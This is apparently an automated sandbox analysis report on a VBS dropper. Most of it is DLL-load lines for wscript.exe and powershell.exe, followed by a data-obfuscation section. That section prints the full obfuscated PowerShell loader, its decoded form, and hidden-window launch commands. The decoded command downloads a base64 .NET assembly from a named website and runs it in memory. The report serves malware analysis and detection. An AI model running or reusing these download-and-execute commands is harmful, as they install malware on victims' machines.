                        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

                        Data Obfuscation

                        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell $ExeNy = 'J?Bi?Gk?awB5?Gc?I??9?C??Jw?w?DE?Mw?n?Ds?J?Br?G4?dwBt", "0", "false");
                        Source: 3.2.powershell.exe.29b1bb69730.2.raw.unpack, Class1.cs.Net Code: ZxKHG System.AppDomain.Load(byte[])
                        Source: 3.2.powershell.exe.29b1a88d8c0.1.raw.unpack, Class1.cs.Net Code: ZxKHG System.AppDomain.Load(byte[])
                        Source: 3.2.powershell.exe.29b32a20000.4.raw.unpack, Class1.cs.Net Code: ZxKHG System.AppDomain.Load(byte[])
                        Source: 21.2.powershell.exe.23a3ac26860.1.raw.unpack, Class1.cs.Net Code: ZxKHG System.AppDomain.Load(byte[])
                        Source: 21.2.powershell.exe.23a3b3ccdd8.2.raw.unpack, Class1.cs.Net Code: ZxKHG System.AppDomain.Load(byte[])
                        Source: 36.2.powershell.exe.1b994479a60.2.raw.unpack, Class1.cs.Net Code: ZxKHG System.AppDomain.Load(byte[])
                        Source: 36.2.powershell.exe.1b993cd6900.0.raw.unpack, Class1.cs.Net Code: ZxKHG System.AppDomain.Load(byte[])
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $ExeNy = 'J?Bi?Gk?awB5?Gc?I??9?C??Jw?w?DE?Mw?n?Ds?J?Br?G4?dwBt?Hg?I??9?C??Jw?l?H??egBB?GM?TwBn?Ek?bgBN?HI?JQ?n?Ds?WwBC?Hk?d?Bl?Fs?XQBd?C??J?Bu?HU?c?Bj?HM?I??9?C??WwBz?Hk?cwB0?GU?bQ?u?EM?bwBu?HY?ZQBy?HQ?XQ?6?Do?RgBy?G8?bQBC?GE?cwBl?DY?N?BT?HQ?cgBp?G4?Zw?o?C??K?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??TgBl?HQ?LgBX?GU?YgBD?Gw?aQBl?G4?d??p?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?JwBo?HQ?d?Bw?HM?Og?v?C8?dwB3?Hc?LgBp?G4?ZgBv?HI?bQBh?GM?aQBv?G4?bwBw?G8?cgB0?HU?bgBh?C4?YwBv?G0?LwB3?H??LQBj?G8?bgB0?GU?bgB0?C8?dQBw?Gw?bwBh?GQ?cw?v?DI?M??y?DQ?Lw?w?Dk?LwBk?Gw?b?Bz?Gs?eQBm?GE?b??u?HQ?e?B0?Cc?KQ?p?Ds?WwBz?Hk?cwB0?GU?bQ?u?EE?c?Bw?EQ?bwBt?GE?aQBu?F0?Og?6?EM?dQBy?HI?ZQBu?HQ?R?Bv?G0?YQBp?G4?LgBM?G8?YQBk?Cg?J?Bu?HU?c?Bj?HM?KQ?u?Ec?ZQB0?FQ?eQBw?GU?K??n?EM?b?Bh?HM?cwBM?Gk?YgBy?GE?cgB5?DE?LgBD?Gw?YQBz?HM?MQ?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?WgB4?Es?S?BH?Cc?KQ?u?Ek?bgB2?G8?awBl?Cg?J?Bu?HU?b?Bs?Cw?I?Bb?G8?YgBq?GU?YwB0?Fs?XQBd?C??K??n?HQ?e?B0?C4?cwBv?GM?bQBl?HI?Lw?3?D??Lw?0?DI?M??y?C8?cwBk?GE?bwBs?H??dQ?v?HQ?bgBl?HQ?bgBv?GM?LQBw?Hc?LwBt?G8?Yw?u?GE?bgB1?HQ?cgBv?H??bwBu?G8?aQBj?GE?bQBy?G8?ZgBu?Gk?LgB3?Hc?dw?v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?Gs?bgB3?G0?e??g?Cw?I??n?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?Xw?t?C0?LQ?t?C0?LQ?t?C0?LQ?t?C0?LQ?t?Cc?L??g?CQ?YgBp?Gs?eQBn?Cw?I??n?DE?Jw?s?C??JwBS?G8?Z?Bh?Cc?I??p?Ck?Ow?=';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('?','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;$global:?
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $ExeNy = 'J?Bi?Gk?awB5?Gc?I??9?C??Jw?w?DE?Mw?n?Ds?J?Br?G4?dwBt?Hg?I??9?C??Jw?l?H??egBB?GM?TwBn?Ek?bgBN?HI?JQ?n?Ds?WwBC?Hk?d?Bl?Fs?XQBd?C??J?Bu?HU?c?Bj?HM?I??9?C??WwBz?Hk?cwB0?GU?bQ?u?EM?bwBu?HY?ZQBy?HQ?XQ?6?Do?RgBy?G8?bQBC?GE?cwBl?DY?N?BT?HQ?cgBp?G4?Zw?o?C??K?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??TgBl?HQ?LgBX?GU?YgBD?Gw?aQBl?G4?d??p?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?JwBo?HQ?d?Bw?HM?Og?v?C8?dwB3?Hc?LgBp?G4?ZgBv?HI?bQBh?GM?aQBv?G4?bwBw?G8?cgB0?HU?bgBh?C4?YwBv?G0?LwB3?H??LQBj?G8?bgB0?GU?bgB0?C8?dQBw?Gw?bwBh?GQ?cw?v?DI?M??y?DQ?Lw?w?Dk?LwBk?Gw?b?Bz?Gs?eQBm?GE?b??u?HQ?e?B0?Cc?KQ?p?Ds?WwBz?Hk?cwB0?GU?bQ?u?EE?c?Bw?EQ?bwBt?GE?aQBu?F0?Og?6?EM?dQBy?HI?ZQBu?HQ?R?Bv?G0?YQBp?G4?LgBM?G8?YQBk?Cg?J?Bu?HU?c?Bj?HM?KQ?u?Ec?ZQB0?FQ?eQBw?GU?K??n?EM?b?Bh?HM?cwBM?Gk?YgBy?GE?cgB5?DE?LgBD?Gw?YQBz?HM?MQ?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?WgB4?Es?S?BH?Cc?KQ?u?Ek?bgB2?G8?awBl?Cg?J?Bu?HU?b?Bs?Cw?I?Bb?G8?YgBq?GU?YwB0?Fs?XQBd?C??K??n?HQ?e?B0?C4?cwBv?GM?bQBl?HI?Lw?3?D??Lw?0?DI?M??y?C8?cwBk?GE?bwBs?H??dQ?v?HQ?bgBl?HQ?bgBv?GM?LQBw?Hc?LwBt?G8?Yw?u?GE?bgB1?HQ?cgBv?H??bwBu?G8?aQBj?GE?bQBy?G8?ZgBu?Gk?LgB3?Hc?dw?v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?Gs?bgB3?G0?e??g?Cw?I??n?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?Xw?t?C0?LQ?t?C0?LQ?t?C0?LQ?t?C0?LQ?t?Cc?L??g?CQ?YgBp?Gs?eQBn?Cw?I??n?DE?Jw?s?C??JwBS?G8?Z?Bh?Cc?I??p?Ck?Ow?=';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('?','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;$global:?
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8 Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $nupcs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nupcs).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'Roda' ));"
                        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -WindowStyle hidden "& 'C:\Users\user\AppData\Local\Temp\xx2.vbs' "
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs'
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b 